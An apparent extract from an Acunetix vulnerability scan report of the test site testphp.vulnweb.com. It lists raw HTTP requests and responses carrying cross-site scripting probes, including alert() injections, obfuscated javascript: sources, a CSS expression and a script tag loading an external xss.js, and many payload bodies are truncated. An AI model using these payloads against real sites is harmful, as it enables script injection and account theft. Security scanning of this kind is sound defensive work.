Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

109

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close /listproducts.php Details

Request GET /listproducts.php?cat= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:44:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton =go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

110

/search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 86 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28444185894188%29%3B%22%3E&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=%00"'>alert(444335894652)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Acunetix Website Audit

111

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 100 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=
Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 144 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 122 Cookie: mycookie=3 Acunetix Website Audit

112

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor="+src="http://testphp.acunetix.com/xss.js?444285894652">&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

113

searchFor=&goBu Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 82 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=%3C/xss/*-*/style=xss:e/**/xpression(alert(444415895089))%3E&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 68 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

114

/search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=alert(444305894652)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=%00'">alert(444325894652)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

115

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 95 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goB Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=email@somealert(444075893748)%3Bdomain.com&goButton= go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 78 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

116

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 73 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=-->alert(444065893748)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 73 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=>">alert(444035893748)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Acunetix Website Audit

117

Connection: close /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 73 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=>'>alert(444025893748)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 81 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=alert(444045893748)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Acunetix Website Audit

118

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 93 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28444095893749%29%3B%22%3E&goBut Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 55 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 64 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

119

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details

Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 111 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 58 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

120

Date: Mon, 21 Aug 2017 08:38:48 GMT Content-Type: text/html Connection: close /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 70 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=alert(444015893748)%3B&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /search.php Details Request POST /search.php?test=query HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 76 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm searchFor=&goButton=go Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:38:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request Acunetix Website Audit

121

POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Acunetix Website Audit

122

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress=
Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=si gnup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

124

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

125

Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= &signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

126

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= alert(520405953823)%3B&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 357 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix Website Audit

127

Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected][email protected]&uaddress= "+src="http://testphp.acunetix.com/xss.js?520385953823">&signup= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: 